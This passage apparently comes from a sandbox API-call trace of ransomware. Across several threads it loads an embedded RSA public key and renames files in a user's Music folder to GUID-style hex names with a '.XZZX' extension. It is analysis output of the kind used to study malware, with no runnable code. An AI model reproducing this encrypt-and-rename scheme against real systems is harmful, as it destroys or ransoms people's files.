lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0114.152] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.152] SetErrorMode (uMode=0x1) returned 0x1 [0114.152] lstrcpyW (in: lpString1=0x420f860, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0114.152] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7eac85ca, Data2=0x4ab7, Data3=0x4d27, Data4=([0]=0xaf, [1]=0x43, [2]=0xb4, [3]=0xe3, [4]=0xd8, [5]=0x5e, [6]=0x37, [7]=0x66))) returned 0x0 [0114.152] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned 77 [0114.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.152] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6C00076616846CE17EAC85CA1AA55129.XZZX") returned 77 [0114.152] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 354 os_tid = 0x88c [0114.309] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.309] lstrcpyW (in: lpString1=0x420f460, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0114.309] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.309] SetErrorMode (uMode=0x1) returned 0x1 [0114.309] lstrcpyW (in: lpString1=0x420f860, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0114.309] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x69290432, Data2=0xe708, Data3=0x4852, Data4=([0]=0x9e, [1]=0xd1, [2]=0x2d, [3]=0x98, [4]=0x78, [5]=0xe7, [6]=0xf, [7]=0xa3))) returned 0x0 [0114.309] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\70CB960A1797B0A14EB31B321C2694E9.XZZX") returned 77 [0114.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.309] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4C113F904144409069290432456524D8.XZZX") returned 77 [0114.309] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 355 os_tid = 0x894 [0114.469] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.469] lstrcpyW (in: lpString1=0x420f460, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0114.469] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.469] SetErrorMode (uMode=0x1) returned 0x1 [0114.469] lstrcpyW (in: lpString1=0x420f860, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0114.469] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x84e51ccc, Data2=0x8623, Data3=0x41bc, Data4=([0]=0xab, [1]=0xe3, [2]=0x69, [3]=0x84, [4]=0xd0, [5]=0x8d, [6]=0x5f, [7]=0xb2))) returned 0x0 [0114.469] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned 77 [0114.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.469] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1865B7E4227164B484E51CCC269248FC.XZZX") returned 77 [0114.469] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 356 os_tid = 0x898 [0114.629] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.629] lstrcpyW (in: lpString1=0x420f460, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0114.629] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.629] SetErrorMode (uMode=0x1) returned 0x1 [0114.629] lstrcpyW (in: lpString1=0x420f860, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0114.629] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7fcfec9f, Data2=0x244e, Data3=0x42e6, Data4=([0]=0x94, [1]=0x23, [2]=0xbd, [3]=0x74, [4]=0xe3, [5]=0xf4, [6]=0x32, [7]=0x32))) returned 0x0 [0114.629] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned 77 [0114.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.629] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2EA07472097CBA147FCFEC9F0D9D9E5C.XZZX") returned 77 [0114.629] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 357 os_tid = 0x89c [0114.776] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.776] lstrcpyW (in: lpString1=0x420f460, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0114.776] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.776] SetErrorMode (uMode=0x1) returned 0x1 [0114.776] lstrcpyW (in: lpString1=0x420f860, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0114.776] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x902dd024, Data2=0x369c, Data3=0x47d6, Data4=([0]=0xaa, [1]=0x68, [2]=0xcb, [3]=0x44, [4]=0x62, [5]=0x71, [6]=0x33, [7]=0xb4))) returned 0x0 [0114.776] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned 77 [0114.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.776] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\85D26DF00F52EA68902DD0241373CEB0.XZZX") returned 77 [0114.776] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 358 os_tid = 0x8a0 [0114.932] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.932] lstrcpyW (in: lpString1=0x420f460, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0114.932] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.932] SetErrorMode (uMode=0x1) returned 0x1 [0114.932] lstrcpyW (in: lpString1=0x420f860, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0114.932] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2d704b1f, Data2=0xe938, Data3=0x4857, Data4=([0]=0x88, [1]=0x12, [2]=0xf9, [3]=0x33, [4]=0xc2, [5]=0xe1, [6]=0x10, [7]=0x58))) returned 0x0 [0114.932] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned 77 [0114.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0114.932] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\24EFA5C841E702082D704B1F4607E650.XZZX") returned 77 [0114.932] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 359 os_tid = 0x8a4 [0115.087] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.087] lstrcpyW (in: lpString1=0x420f460, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0115.087] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0115.087] SetErrorMode (uMode=0x1) returned 0x1 [0115.088] lstrcpyW (in: lpString1=0x420f860, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0115.088] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5cfbec7a, Data2=0x96ae, Data3=0x402e, Data4=([0]=0x81, [1]=0x48, [2]=0x8d, [3]=0x7d, [4]=0xa5, [5]=0x4c, [6]=0xb, [7]=0xc9))) returned 0x0 [0115.088] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FCD862501902E584E01CEFE81DABC9CC.XZZX") returned 77 [0115.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.088] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CFCA36EC25C693445CFBEC7A29E7778C.XZZX") returned 77 [0115.088] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 360 os_tid = 0x8a8 [0115.249] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.249] lstrcpyW (in: lpString1=0x420f460, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0115.249] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.249] SetErrorMode (uMode=0x1) returned 0x1 [0115.249] lstrcpyW (in: lpString1=0x420f860, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0115.249] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x688d9f3f, Data2=0xf535, Data3=0x4028, Data4=([0]=0xad, [1]=0x57, [2]=0x56, [3]=0x56, [4]=0xd, [5]=0x8c, [6]=0x62, [7]=0xa4))) returned 0x0 [0115.249] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1037641408F8F044B7533AA10D10D48C.XZZX") returned 96 [0115.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0115.249] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2EB9430B3D739048688D9F3F41947490.XZZX") returned 96 [0115.249] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 361 os_tid = 0x8ac [0115.400] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.400] lstrcpyW (in: lpString1=0x420f460, lpString2="2--S BWBtG7 nG.mp3" | out: lpString1="2--S BWBtG7 nG.mp3") returned="2--S BWBtG7 nG.mp3" [0115.400] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.400] SetErrorMode (uMode=0x1) returned 0x1 [0115.400] lstrcpyW (in: lpString1=0x420f860, lpString2="2--S BWBtG7 nG.mp3" | out: lpString1="2--S BWBtG7 nG.mp3") returned="2--S BWBtG7 nG.mp3" [0115.400] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x3adf3b8e, Data2=0xc0e1, Data3=0x4a27, Data4=([0]=0xb1, [1]=0x1, [2]=0x1f, [3]=0xa9, [4]=0x7f, [5]=0xec, [6]=0xd7, [7]=0x6b))) returned 0x0 [0115.400] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: 